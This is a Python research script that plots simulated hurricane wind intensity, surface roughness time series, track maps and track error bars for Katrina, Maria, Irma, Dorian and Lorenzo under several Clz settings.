csv_reader = csv.DictReader(csv_file)
line_count = 0
for row in csv_reader:
if line_count == 0:
print(f'Column names are {', '.join(row)}')
Times.append(list(row.keys()))
line_count += 1
#print(row)
rows.append(row)
values.append(list(row.values()))
line_count += 1
print(f'Processed {line_count} lines.')
Times0=Times[0]
print(Times0)
print(values[0])
print(position[kk])
ax = fig.add_subplot(spec[position2[kk][0]:position2[kk][1],\
position2[kk][2]:position2[kk][3]])
ax.text(0.05, 0.85, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
size=30, **csfont)
for i in range(0,line_count-1):
if i==0:
#tmp=[float(i)*0.5144444 for i in values[i]]
tmp=[float(i) for i in values[i]]
# elif (i!=2 and i!=3):
else:
tmp=[float(i) for i in values[i]]
# else:
# continue
if hurricanes[kk]=='Katrina':
plt.plot( Times0[:5], tmp[:5], color = colors[c+1], \
linestyle=list(linestyles.values())[c+1],\
linewidth=5, markersize=sizes[c+1])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.ylim([1e-11, 3.0])
plt.yscale('log')
elif hurricanes[kk]=='Dorian':
plt.plot( Times0[:-2], tmp[:-2], color = colors[c+1], \
linestyle=list(linestyles.values())[c+1],\
linewidth=5, markersize=sizes[c+1])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.ylim([1e-11, 3.0])
plt.yscale('log')
else:
plt.plot( Times0, tmp, color = colors[c+1], \
linestyle=list(linestyles.values())[c+1],\
linewidth=5, markersize=sizes[c+1])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.gca().yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))
plt.ylim([1e-11, 3.0])
plt.yscale('log')
c+=1
for axis in ['top','bottom','left','right']:
ax.spines[axis].set_linewidth(2)
ax.tick_params(length=5, width=2)
fig.legend(models, bbox_to_anchor=(0.87, 0.42), prop=font, \
frameon=False)
if kk==0 or kk==3:
plt.ylabel(r'$Z_0$ (m)', **csfont, fontsize=30)
if kk==2 or kk==3 or kk==4:
plt.xlabel(r"Time Series (hr)", fontsize=30, **csfont)
plt.title(hurricanes[kk], {'size': 30}, **csfont)
plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_ZNT_eyewall.png', dpi=500)
plt.show()
########################
# Plot hurricane track #
########################
fig = plt.figure(figsize=(15,10))
spec = mpl.gridspec.GridSpec(ncols=6, nrows=2)
for kk in range(len(hurricanes)):
if hurricanes[kk]=='Katrina':
cons=6
elif hurricanes[kk]=='Dorian':
cons=8
else:
cons=10
real1=[]
oussama1=[]
wrf1=[]
simu1=[]
with open( dir_wt[kk], 'r' ) as f :
data0 = f.read()
data = json.loads('[' + data0.replace('}{', '},{') + ']')
for i in range(0,len(data)):
data2 = list(data[i].values())
data3 = [e for sl in data2 for e in sl]
for j in range(len(data3)):
data3[j].pop(0)
if i==0:
real1.append(data3)
# elif i==1:
# oussama1.append(data3)
# elif i==2:
# wrf1.append(data3)
else:
simu1.append(data3)
real1 = np.array(real1, dtype=np.float32)
simu1 = np.array(simu1, dtype=np.float32)
real_r = np.radians(real1)
simu_r = np.radians(simu1)
term1=np.apply_along_axis(Calculate_Distance_Haversine1, 2, simu_r-real_r)
term2=np.apply_along_axis(Calculate_Distance_Haversine2, 2, simu_r)* \
np.apply_along_axis(Calculate_Distance_Haversine2, 2, real_r)* \
np.apply_along_axis(Calculate_Distance_Haversine3, 2, simu_r-real_r)
simu_error1=2*R*np.arcsin(np.sqrt(term1+term2))
# ax = fig.add_subplot(spec[position[kk][0],position[kk][1]:position[kk][2]])
# ax.text(0.05, 0.9, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
# size=30)
slp2D = pickle.load( open( dir_p[kk], "rb" ) )
lats, lons = latlon_coords(slp2D)
# Get the cartopy mapping object (use original data, rather than any processed data)
cart_proj = get_cartopy(slp2D)
# Set the GeoAxes to the projection used by WRF
#ax = plt.axes(projection=cart_proj)
ax = fig.add_subplot(spec[position[kk][0],position[kk][1]:position[kk][2]], projection=cart_proj)
# ax.stock_img()
# Download and add the states and coastlines
states = NaturalEarthFeature(category="cultural", scale="50m",
facecolor="none",
name="admin_1_states_provinces_shp")
ax.add_feature(states, linewidth=.5, edgecolor="black")
ax.coastlines('50m', linewidth=0.8)
# Set the map bounds
# ax.set_xlim(cartopy_xlim(slp2D))
# ax.set_ylim(cartopy_ylim(slp2D))
ax.set_extent(lat_log_bound[kk])
ax.background_img(name='SR', resolution='high')
# Show grid lines.
gl = ax.gridlines(crs=crs.PlateCarree(), draw_labels=True,
linewidth=1.5, color='gray', alpha=0.8, linestyle=':')
gl.xlabel_style = {'size': 15, 'color': 'k','fontname':'Times New Roman'}
gl.ylabel_style = {'size': 15, 'color': 'k','fontname':'Times New Roman'}
gl.xlabels_top = False
gl.ylabels_right = False
c=0
ll=[]
rr=[]
for i in range(real1.shape[0]):
for j in range(real1.shape[1]):
if j<cons:
ll.append(real1[i][j][0])
rr.append(real1[i][j][1])
ax.plot( rr, ll, color = colors[c], marker=markers[c],linewidth=2, \
linestyle=list(linestyles.values())[c],\
markersize=sizes[c], transform=crs.PlateCarree())
c+=1
ll=[]
rr=[]
for i in range(simu1.shape[0]):
for j in range(simu1.shape[1]):
if j<cons:
ll.append(simu1[i][j][0])
rr.append(simu1[i][j][1])
ax.plot( rr, ll, color = colors[c], marker=markers[c],linewidth=2, \
linestyle=list(linestyles.values())[c],\
markersize=sizes[c], transform=crs.PlateCarree())
c+=1
ll=[]
rr=[]
for axis in ['top','bottom','left','right']:
ax.spines[axis].set_linewidth(15)
fig.legend(options, bbox_to_anchor=(0.87, 0.42), prop=font_wt, \
frameon=False)
plt.title(hurricanes[kk], {'size': 25}, **csfont)
# plt.legend(['Real track','C0.0001', 'C0.01', 'C1', 'C100'],\
# loc = "upper right", prop={'size': 7})
# plt.xlabel("Lon", fontsize=135)
# plt.ylabel("Lat", fontsize=135)
# plt.title(hurricanes[kk], {'size': 35}, **csfont)
# plt.show()
plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_wt.png', dpi=500)
plt.show()
# fig = plt.figure(figsize=(15,10))
# spec = mpl.gridspec.GridSpec(ncols=6, nrows=2)
# for kk in range(len(hurricanes)):
# real1=[]
# oussama1=[]
# wrf1=[]
# simu1=[]
# with open( dir_wt[kk], 'r' ) as f :
# data0 = f.read()
# data = json.loads('[' + data0.replace('}{', '},{') + ']')
# for i in range(0,len(data)):
# data2 = list(data[i].values())
# data3 = [e for sl in data2 for e in sl]
# for j in range(len(data3)):
# data3[j].pop(0)
# if i==0:
# real1.append(data3)
# # elif i==1:
# # oussama1.append(data3)
# # elif i==2:
# # wrf1.append(data3)
# else:
# simu1.append(data3)
# real1 = np.array(real1, dtype=np.float32)
# simu1 = np.array(simu1, dtype=np.float32)
# real_r = np.radians(real1)
# simu_r = np.radians(simu1)
# term1=np.apply_along_axis(Calculate_Distance_Haversine1, 2, simu_r-real_r)
# term2=np.apply_along_axis(Calculate_Distance_Haversine2, 2, simu_r)* \
# np.apply_along_axis(Calculate_Distance_Haversine2, 2, real_r)* \
# np.apply_along_axis(Calculate_Distance_Haversine3, 2, simu_r-real_r)
# simu_error1=2*R*np.arcsin(np.sqrt(term1+term2))
# m = Basemap(projection='merc', llcrnrlat=lat_log_bound[kk][2],\
# urcrnrlat=lat_log_bound[kk][3], \
# llcrnrlon=lat_log_bound[kk][0], \
# urcrnrlon=lat_log_bound[kk][1], resolution= 'f' )
# m.drawstates()
# m.drawmeridians([-100, -90, -80, -70, -60, -50, -40, ], color='k', textcolor='k', linewidth=1.5,
# zorder=None, dashes=[6, 1000], labels=[1, 0, 0, 1], labelstyle=None, fmt='%g', xoffset=None,
# yoffset=None, ax=None, latmax=None, fontsize=12)
# m.drawparallels([10, 15, 20, 25, 30, 35], color='k', textcolor='k', linewidth=1.5, zorder=None, dashes=[6, 1000],
# labels=[1, 0, 0, 1], labelstyle=None, fmt='%g', xoffset=None, yoffset=None, ax=None, latmax=None, fontsize=12)
# m.drawmapscale(-101, 8, -96, 8, 1000, barstyle='fancy', units='km', fontsize=8)
# m.drawcoastlines(linewidth=0.7, linestyle='solid', color='grey')
# m.drawcountries()
# m.shadedrelief()
# m.drawmapboundary()
# # ax = fig.add_subplot(spec[position[kk][0],position[kk][1]:position[kk][2]])
# # ax.text(0.05, 0.9, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
# # size=30)
# slp2D = pickle.load( open( dir_p[kk], "rb" ) )
# lats, lons = latlon_coords(slp2D)
# # Get the cartopy mapping object (use original data, rather than any processed data)
# cart_proj = get_cartopy(slp2D)
# # Set the GeoAxes to the projection used by WRF
# #ax = plt.axes(projection=cart_proj)
# ax = fig.add_subplot(spec[position[kk][0],position[kk][1]:position[kk][2]], projection=cart_proj)
# ax.stock_img()
# # Download and add the states and coastlines
# states = NaturalEarthFeature(category="cultural", scale="50m",
# facecolor="none",
# name="admin_1_states_provinces_shp")
# ax.add_feature(states, linewidth=.5, edgecolor="black")
# ax.coastlines('50m', linewidth=0.8)
# # Set the map bounds
# # ax.set_xlim(cartopy_xlim(slp2D))
# # ax.set_ylim(cartopy_ylim(slp2D))
# ax.set_extent(lat_log_bound[kk])
# # Show grid lines.
# gl = ax.gridlines(crs=crs.PlateCarree(), draw_labels=True,
# linewidth=1.5, color='gray', alpha=0.8, linestyle=':')
# gl.xlabel_style = {'size': 15, 'color': 'k'}
# gl.ylabel_style = {'size': 15, 'color': 'k'}
# gl.xlabels_top = False
# gl.ylabels_right = False
# c=0
# ll=[]
# rr=[]
# for i in range(real1.shape[0]):
# for j in range(real1.shape[1]):
# if j<6:
# ll.append(real1[i][j][0])
# rr.append(real1[i][j][1])
# ax.plot( rr, ll, color = colors[c], marker=markers[c],linewidth=2, linestyle=patterns[c],\
# markersize=sizes[c], transform=crs.PlateCarree())
# c+=1
# ll=[]
# rr=[]
# for i in range(simu1.shape[0]):
# for j in range(simu1.shape[1]):
# if j<6:
# ll.append(simu1[i][j][0])
# rr.append(simu1[i][j][1])
# ax.plot( rr, ll, color = colors[c], marker=markers[c],linewidth=2, linestyle=patterns[c],\
# markersize=sizes[c], transform=crs.PlateCarree())
# c+=1
# ll=[]
# rr=[]
# for axis in ['top','bottom','left','right']:
# ax.spines[axis].set_linewidth(15)
# fig.legend(options, bbox_to_anchor=(0.87, 0.42), prop=font_wt, \
# frameon=False)
# plt.title(hurricanes[kk], {'size': 25}, **csfont)
# # plt.legend(['Real track','C0.0001', 'C0.01', 'C1', 'C100'],\
# # loc = "upper right", prop={'size': 7})
# # plt.xlabel("Lon", fontsize=135)
# # plt.ylabel("Lat", fontsize=135)
# # plt.title(hurricanes[kk], {'size': 35}, **csfont)
# # plt.show()
# plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_wt.png', dpi=500)
# plt.show()
# ###################
# # Plot error bars #
# ###################
# simu_error = []
# for kk in range(len(hurricanes)):
# rows1=[]
# Times1=[]
# Times1=[]
# values1=[]
# real1_track=[]
# with open(dir_wi[kk], mode='r') as csv_file:
# csv_reader = csv.DictReader(csv_file)
# line_count = 0
# sim_count = 0
# for row in csv_reader:
# if line_count == 0:
# print(f'Column names are {', '.join(row)}')
# Times1.append(list(row.keys()))
# real1_track.append(list(row.values()))
# line_count += 1
# else:
# rows1.append(row)
# values1.append(list(row.values()))
# line_count += 1
# print('There is totally ',(line_count-1)*(len(row)),' data points')
# simu1=np.array(values1, dtype=np.float32)
# real1=np.array(real1_track, dtype=np.float32)
# real1=real1*0.5144444
# real1=real1
# simu_error1=abs(simu1-real1[:,None])/real1[:,None]#/((line_count-3)*(len(row)))
# print('absolute pressure error')
# print(abs(simu1-real1[:,None]))
# simu_error.append(simu_error1)
# par1_error_wi=np.zeros((4, 9))
# par2_error_wi=np.zeros((4, 9))
# par3_erro_wir=np.zeros((4, 9))
# par4_error_wi=np.zeros((4, 9))
# simu_error1 = simu_error[0]
# simu_error2 = simu_error[1]
# simu_error3 = simu_error[2]
# simu_error4 = simu_error[3]
# simu_error5 = simu_error[4]
# par1_error_wi=np.concatenate((simu_error1[0][0][0:5],simu_error2[0][0][:],\
# simu_error3[0][0][:],simu_error4[0][0][:-2],simu_error5[0][0][:]))
# par1_error_wi=par1_error_wi.flatten()
# par1_error_wi_mean=np.mean(par1_error_wi)
# par1_error_wi_std=np.std(par1_error_wi)
# par1_error_wi_low=np.percentile(par1_error_wi, 20)
# par1_error_wi_hgh=np.percentile(par1_error_wi, 80)
# par2_error_wi=np.concatenate((simu_error1[0][1][0:5],simu_error2[0][1][:],\
# simu_error3[0][1][:],simu_error4[0][1][:-2],simu_error5[0][1][:]))
# par2_error_wi=par2_error_wi.flatten()
# par2_error_wi_mean=np.mean(par2_error_wi)
# par2_error_wi_std=np.std(par2_error_wi)
# par2_error_wi_low=np.percentile(par2_error_wi, 20)
# par2_error_wi_hgh=np.percentile(par2_error_wi, 80)
# par3_error_wi=np.concatenate((simu_error1[0][2][0:5],simu_error2[0][2][:],\
# simu_error3[0][2][:],simu_error4[0][2][:-2],simu_error5[0][2][:]))
# par3_error_wi=par3_error_wi.flatten()
# par3_error_wi_mean=np.mean(par3_error_wi)
# par3_error_wi_std=np.std(par3_error_wi)
# par3_error_wi_low=np.percentile(par3_error_wi, 20)
# par3_error_wi_hgh=np.percentile(par3_error_wi, 80)
# par4_error_wi=np.concatenate((simu_error1[0][3][0:5],simu_error2[0][3][:],\
# simu_error3[0][3][:],simu_error4[0][3][:-2],simu_error5[0][3][:]))
# par4_error_wi=par4_error_wi.flatten()
# par4_error_wi_mean=np.mean(par4_error_wi)
# par4_error_wi_std=np.std(par4_error_wi)
# par4_error_wi_low=np.percentile(par4_error_wi, 20)
# par4_error_wi_hgh=np.percentile(par4_error_wi, 80)
# simu_error = []
# for kk in range(len(hurricanes)):
# real1=[]
# oussama1=[]
# wrf1=[]
# simu1=[]
# with open( dir_wt[kk], 'r' ) as f :
# data0 = f.read()
# data = json.loads('[' + data0.replace('}{', '},{') + ']')
# for i in range(0,len(data)):
# data2 = list(data[i].values())
# data3 = [e for sl in data2 for e in sl]
# for j in range(len(data3)):
# data3[j].pop(0)
# if i==0:
# real1.append(data3)
# # elif i==1:
# # oussama1.append(data3)
# # elif i==2:
# # wrf1.append(data3)
# else:
# simu1.append(data3)
# real1 = np.array(real1, dtype=np.float32)
# simu1 = np.array(simu1, dtype=np.float32)
# real_r = np.radians(real1)
# simu_r = np.radians(simu1)
# term1=np.apply_along_axis(Calculate_Distance_Haversine1, 2, simu_r-real_r)
# term2=np.apply_along_axis(Calculate_Distance_Haversine2, 2, simu_r)* \
# np.apply_along_axis(Calculate_Distance_Haversine2, 2, real_r)* \
# np.apply_along_axis(Calculate_Distance_Haversine3, 2, simu_r-real_r)
# simu_error1=2*R*np.arcsin(np.sqrt(term1+term2))
# simu_error.append(simu_error1)
# par1_error=np.zeros((4, 9))
# par2_error=np.zeros((4, 9))
# par3_error=np.zeros((4, 9))
# par4_error=np.zeros((4, 9))
# simu_error1 = simu_error[0]
# simu_error2 = simu_error[1]
# simu_error3 = simu_error[2]
# simu_error4 = simu_error[3]
# simu_error5 = simu_error[4]
# par1_error_wt=np.concatenate((simu_error1[0][0:5],\
# simu_error2[0][:],simu_error3[0][:],\
# simu_error4[0][:-2],simu_error5[0][:]))
# par1_error_wt=par1_error_wt.flatten()
# par1_error_wt_mean=np.mean(par1_error_wt)
# par1_error_wt_std=np.std(par1_error_wt)
# par1_error_wt_low=np.percentile(par1_error_wt, 20)
# par1_error_wt_hgh=np.percentile(par1_error_wt, 80)
# par2_error_wt=np.concatenate((simu_error1[1][0:5],\
# simu_error2[1][:],simu_error3[1][:],\
# simu_error4[1][:-2],simu_error5[1][:]))
# par2_error_wt=par2_error_wt.flatten()
# par2_error_wt_mean=np.mean(par2_error_wt)
# par2_error_wt_std=np.std(par2_error_wt)
# par2_error_wt_low=np.percentile(par2_error_wt, 20)
# par2_error_wt_hgh=np.percentile(par2_error_wt, 80)
# par3_error_wt=np.concatenate((simu_error1[2][0:5],\
# simu_error2[2][:],simu_error3[2][:],\
# simu_error4[2][:-2],simu_error5[2][:]))
# par3_error_wt=par3_error_wt.flatten()
# par3_error_wt_mean=np.mean(par3_error_wt)
# par3_error_wt_std=np.std(par3_error_wt)
# par3_error_wt_low=np.percentile(par2_error_wt, 20)
# par3_error_wt_hgh=np.percentile(par2_error_wt, 80)
# par4_error_wt=np.concatenate((simu_error1[3][0:5],\
# simu_error2[3][:],simu_error3[3][:],\
# simu_error4[3][:-2],simu_error5[3][:]))
# par4_error_wt=par4_error_wt.flatten()
# par4_error_wt_mean=np.mean(par4_error_wt)
# par4_error_wt_std=np.std(par4_error_wt)
# par4_error_wt_low=np.percentile(par4_error_wt, 20)
# par4_error_wt_hgh=np.percentile(par4_error_wt, 80)
# print(par4_error_wt_low, par4_error_wt_mean, par4_error_wt_hgh)
# x_pos = np.arange(len(models))
# CTEs_wi = [par1_error_wi_mean,\
# par2_error_wi_mean,par3_error_wi_mean,par4_error_wi_mean]
# errors_wi = [par1_error_wi_std,\
# par2_error_wi_std,par3_error_wi_std,par4_error_wi_std]
# percentile_10_wi = np.array([par1_error_wi_mean-par1_error_wi_low,\
# par2_error_wi_mean-par2_error_wi_low,par3_error_wi_mean-par3_error_wi_low, \
# par4_error_wi_mean-par4_error_wi_low])
# percentile_90_wi = np.array([par1_error_wi_hgh-par1_error_wi_mean,\
# par2_error_wi_hgh-par2_error_wi_mean,par3_error_wi_hgh-par3_error_wi_mean, \
# par4_error_wi_hgh-par4_error_wi_mean])
# err_wi = np.vstack((percentile_10_wi, percentile_90_wi))
# CTEs_wt = [par1_error_wt_mean,\
# par2_error_wt_mean,par3_error_wt_mean,par4_error_wt_mean]
# errors_wt = [par1_error_wt_std,\
# par2_error_wt_std,par3_error_wt_std,par4_error_wt_std]
# percentile_10_wt = np.array([par1_error_wt_mean-par1_error_wt_low,\
# par2_error_wt_mean-par2_error_wt_low,par3_error_wt_mean-par3_error_wt_low, \
# par4_error_wt_mean-par4_error_wt_low])
# percentile_90_wt = np.array([par1_error_wt_hgh-par1_error_wt_mean,\
# par2_error_wt_hgh-par2_error_wt_mean,par3_error_wt_hgh-par3_error_wt_mean, \
# par4_error_wt_hgh-par4_error_wt_mean])
# print(percentile_90_wt)
# err_wt = np.vstack((percentile_10_wt, percentile_90_wt))
# # fig, ax = plt.subplots(1, 2, figsize=(40, 8), sharex=True)
# fig = plt.figure(figsize=(8,5))
# spec = mpl.gridspec.GridSpec(ncols=8, nrows=5)
# ax = fig.add_subplot(spec[1:,0:4])
# ax.text(0.05, 0.9, '('+string.ascii_lowercase[0]+')', transform=ax.transAxes,
# size=15, **csfont)
# bars = ax.bar(x_pos, CTEs_wi, yerr=err_wi, align='center', \
# color=['blue','cyan','gray', 'red'], alpha=0.8,\
# ecolor='k', capsize=10, edgecolor='k', linewidth=3)
# for i in range(len(x_pos)):
# bars[i].set(linestyle=list(linestyles.values())[0])
# ax.set_ylabel(r'Normalized Intensity', **csfont, fontsize=15)
# vals = ax.get_yticks()
# ax.set_yticklabels(['{:,.0%}'.format(x) for x in vals])
# ax.set_xticks(x_pos)
# ax.set_xticklabels(models, **csfont, fontsize=10)
# #ax.set_title(r'COAWST', **csfont, fontsize=20)
# ax.yaxis.grid(True)
# ax = fig.add_subplot(spec[1:,4:])
# ax.text(0.05, 0.9, '('+string.ascii_lowercase[1]+')', transform=ax.transAxes,
# size=15, **csfont)
# bars = ax.bar(x_pos, CTEs_wt, yerr=err_wt, align='center', \
# color=['blue','cyan','gray', 'red'], alpha=0.8,\
# ecolor='k', capsize=10, edgecolor='k', linewidth=3)
# for i in range(len(x_pos)):
# bars[i].set(linestyle=list(linestyles.values())[0])
# ax.set_ylabel(r'Track Error (km)', **csfont, fontsize=15)
# vals = ax.get_yticks()
# ax.set_yticklabels(['{}'.format(x) for x in vals])
# ax.set_xticks(x_pos)
# ax.set_xticklabels(models, **csfont, fontsize=10)
# #ax.set_title(r'COAWST', **csfont, fontsize=20)
# ax.yaxis.grid(True)
# ax = fig.add_subplot(spec[0,0:])
# handles = [plt.Rectangle((0,0),1,1, facecolor=colors[i+1], \
# linestyle=list(linestyles.values())[0], edgecolor = 'k', linewidth=1.5\
# ) for i in range(len(models))]
# plt.legend(handles, models, ncol=4, bbox_to_anchor=(0.9, 0.8), prop=fontbar, \
# frameon=False)
# ax.axes.xaxis.set_visible(False)
# ax.axes.yaxis.set_visible(False)
# ax.set_yticks([])
# ax.set_yticklabels([])
# ax.set_xticks([])
# ax.set_xticklabels([])
# for axis in ['top','bottom','left','right']:
# ax.spines[axis].set_visible(False)
# # for i, v in enumerate(CTEs):
# # ax.text(i, v+0.02, str(round(v, 3)), color='red', fontweight='bold')
# # Save the figure and show
# fig.autofmt_xdate()
# plt.tight_layout()
# #plt.savefig('wind_intensity_bar_plot.png')
# plt.savefig('C:/Users/limgr/Desktop/wi_wt_bar_plots.png', dpi=500)
# plt.show()
| import csv
import matplotlib.pyplot as plt
import numpy as np
from collections import OrderedDict
import matplotlib as mpl
# import matplotlib.gridspec as gridspec
from matplotlib.ticker import MaxNLocator
from matplotlib.ticker import StrMethodFormatter
import matplotlib.font_manager as font_manager
from matplotlib.patches import Patch
import string
from netCDF4 import Dataset
import json
from cartopy.feature import NaturalEarthFeature
import cartopy.crs as crs
import pickle
from wrf import (to_np, getvar, smooth2d, get_cartopy, cartopy_xlim,
cartopy_ylim, latlon_coords)
import cartopy
import os
from PIL import Image
Image.MAX_IMAGE_PIXELS = None
map_location = "C:/Users/limgr/.spyder-py3/Map"
os.environ["CARTOPY_USER_BACKGROUNDS"] = map_location
# List the colors that will be used for tracing the track.
csfont = {'fontname':'Times New Roman'}
font = font_manager.FontProperties(family='Times New Roman', size=30)
fontbar = font_manager.FontProperties(family='Times New Roman', size=12)
font_wt = font_manager.FontProperties(family='Times New Roman', size=20)
colors = ['k','blue','cyan','gray', 'red', \
'blue', 'cyan', 'lightcoral', 'turquoise','red','blue','green','pink']
patterns = ['-', '--','-.','-',':',':','--','--', ':','-', '--', ':','-', '--', ':',\
'-.', '-.', '-.', ':', '--', '-']
markers = ['s','D','^','o','*','s','+','x','X','D','^','<','>','v']
sizes = [7, 7, 7, 7, 7, 3, 4, 3, 3, 3, 3, 3, 6,5,4,3,2,2]
options = ["Best Track",\
"Clz=0.0001",\
"Clz=0.01",\
"Clz=1",\
"Clz=100"]
models = ["Clz = 0.0001",\
"Clz = 0.01",\
"Clz = 1",\
"Clz = 100"]
hurricanes = ["Katrina",\
"Maria",\
"Irma",\
"Dorian",\
"Lorenzo"]
# subplot positions
position = [[0,0,2],[0,2,4],[0,4,6],[1,0,2],[1,2,4]]
position2 = [[0,4,0,7],[0,4,8,15],[0,4,16,23],[5,9,0,7],[5,9,8,15]]
linestyles = OrderedDict(
[('solid', (0, ())),
('dashdotted', (0, (3, 3, 1, 3))),
('dashdotdotted', (0, (3, 2, 1, 2, 1, 2))),
('dashed', (0, (3, 3))),
('dotted', (0, (1, 3))),
('dashed', (0, (3, 3))),
('loosely dotted', (0, (1, 10))),
('densely dotted', (0, (1, 1))),
('loosely dashed', (0, (5, 10))),
('densely dashed', (0, (5, 1))),
('loosely dashdotted', (0, (3, 10, 1, 10))),
('densely dashdotted', (0, (3, 1, 1, 1))),
('loosely dashdotdotted', (0, (3, 10, 1, 10, 1, 10))),
('densely dashdotdotted', (0, (3, 1, 1, 1, 1, 1)))])
R = 6373.0 # approxiamte radius of earth in km
# folder for wi and wt files
dir_wi = ['C:/Users/limgr/Desktop/Katrina_wind_intensity_16km.csv',\
'C:/Users/limgr/Desktop/Maria_wind_intensity_16km.csv',\
'C:/Users/limgr/Desktop/Irma_wind_intensity_16km.csv',\
'C:/Users/limgr/Desktop/Dorian_wind_intensity_16km.csv',\
'C:/Users/limgr/Desktop/Lorenzo_wind_intensity_16km.csv']
dir_wt = ['C:/Users/limgr/Desktop/Katrina_track_16km.txt',\
'C:/Users/limgr/Desktop/Maria_track_16km.txt',\
'C:/Users/limgr/Desktop/Irma_track_16km.txt',\
'C:/Users/limgr/Desktop/Dorian_track_16km.txt',\
'C:/Users/limgr/Desktop/Lorenzo_track_16km.txt']
dir_p = ['C:/Users/limgr/Desktop/Katrina_16km.p',\
'C:/Users/limgr/Desktop/Maria_16km.p',\
'C:/Users/limgr/Desktop/Irma_16km.p',\
'C:/Users/limgr/Desktop/Dorian_16km.p',\
'C:/Users/limgr/Desktop/Lorenzo_16km.p']
dir_znt_eye = ['C:/Users/limgr/Desktop/Katrina_ZNT_eye_16km.csv',\
'C:/Users/limgr/Desktop/Maria_ZNT_eye_16km.csv',\
'C:/Users/limgr/Desktop/Irma_ZNT_eye_16km.csv',\
'C:/Users/limgr/Desktop/Dorian_ZNT_eye_16km.csv',\
'C:/Users/limgr/Desktop/Lorenzo_ZNT_eye_16km.csv']
dir_znt_eyewall = ['C:/Users/limgr/Desktop/Katrina_ZNT_eyewall_16km.csv',\
'C:/Users/limgr/Desktop/Maria_ZNT_eyewall_16km.csv',\
'C:/Users/limgr/Desktop/Irma_ZNT_eyewall_16km.csv',\
'C:/Users/limgr/Desktop/Dorian_ZNT_eyewall_16km.csv',\
'C:/Users/limgr/Desktop/Lorenzo_ZNT_eyewall_16km.csv']
dir_wp = ['C:/Users/limgr/Desktop/Katrina_avg_speed_16km.csv', \
'C:/Users/limgr/Desktop/Maria_avg_speed_16km.csv', \
'C:/Users/limgr/Desktop/Irma_avg_speed_16km.csv', \
'C:/Users/limgr/Desktop/Dorian_avg_speed_16km.csv', \
'C:/Users/limgr/Desktop/Lorenzo_avg_speed_16km.csv']
lat_log_bound = [[-90.5, -84.5, 23, 29],\
[-74, -68, 19.5, 25.5],\
[-47, -39, 14, 22],\
[-76.5, -70.5, 23, 29],\
[-45.5, -39.5, 16.5, 22.5]]
lat_log_bound = [[-93, -83, 24, 34],\
[-77, -67, 19, 29],\
[-51, -39, 14, 22],\
[-80, -69, 23, 29],\
[-47, -40, 16.5, 25.5]]
lat_log_bound = [[-91, -85, 24, 30],\
[-77, -67, 19, 29],\
[-51, -39, 14, 22],\
[-78, -70, 23, 29],\
[-47, -40, 16.5, 25.5]]
# lat_log_bound = [[-92, -86, 25, 30],\
# [-74, -68, 21.5, 25.5],\
# [-46, -43.5, 17, 19.5],\
# [-76, -73.5, 25.5, 28],\
# [-46, -42, 19, 23]]
def Calculate_Distance_Haversine1(x):
return (np.sin(x[0]/2))**2
def Calculate_Distance_Haversine2(x):
return np.cos(x[0])
def Calculate_Distance_Haversine3(x):
return (np.sin(x[1]/2))**2
#########################################
# Plot normalized intensity time series #
#########################################
fig = plt.figure(figsize=(20,13))
spec = mpl.gridspec.GridSpec(ncols=23, nrows=9)
for kk in range(len(hurricanes)):
c=0
rows=[]
Times=[]
Times=[]
values=[]
with open(dir_wi[kk], mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file)
line_count = 0
for row in csv_reader:
if line_count == 0:
print(f'Column names are {", ".join(row)}')
Times.append(list(row.keys()))
line_count += 1
#print(row)
rows.append(row)
values.append(list(row.values()))
line_count += 1
print(f'Processed {line_count} lines.')
Times0=Times[0]
print(Times0)
print(values[0])
print(position[kk])
ax = fig.add_subplot(spec[position2[kk][0]:position2[kk][1],\
position2[kk][2]:position2[kk][3]])
ax.text(0.05, 0.85, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
size=30, **csfont)
for i in range(0,line_count-1):
if i==0:
tmp=[float(i)*0.5144444 for i in values[i]]
#tmp=[float(i) for i in values[i]]
# elif (i!=2 and i!=3):
else:
tmp=[float(i) for i in values[i]]
# else:
# continue
if hurricanes[kk]=='Katrina':
plt.plot( Times0[:5], tmp[:5], color = colors[c], \
linestyle=list(linestyles.values())[c],\
linewidth=5, markersize=sizes[c])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.ylim([25, 80])
elif hurricanes[kk]=='Dorian':
plt.plot( Times0[:-2], tmp[:-2], color = colors[c], \
linestyle=list(linestyles.values())[c],\
linewidth=5, markersize=sizes[c])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.ylim([25, 80])
else:
plt.plot( Times0, tmp, color = colors[c], \
linestyle=list(linestyles.values())[c],\
linewidth=5, markersize=sizes[c])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.gca().yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))
plt.ylim([25, 80])
c+=1
for axis in ['top','bottom','left','right']:
ax.spines[axis].set_linewidth(2)
ax.tick_params(length=5, width=2)
fig.legend(options, bbox_to_anchor=(0.87, 0.42), prop=font, \
frameon=False)
if kk==0 or kk==3:
plt.ylabel(r'Intensity (m/s)', **csfont, fontsize=35)
if kk==2 or kk==3 or kk==4:
plt.xlabel(r"Time Series (hr)", fontsize=30, **csfont)
plt.title(hurricanes[kk], {'size': 30}, **csfont)
plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_wind_intensity_A.png', dpi=500)
plt.show()
########################
# Plot ZNT time series #
########################
fig = plt.figure(figsize=(20,13))
spec = mpl.gridspec.GridSpec(ncols=23, nrows=9)
for kk in range(len(hurricanes)):
c=0
rows=[]
Times=[]
Times=[]
values=[]
with open(dir_znt_eye[kk], mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file)
line_count = 0
for row in csv_reader:
if line_count == 0:
print(f'Column names are {", ".join(row)}')
Times.append(list(row.keys()))
line_count += 1
#print(row)
rows.append(row)
values.append(list(row.values()))
line_count += 1
print(f'Processed {line_count} lines.')
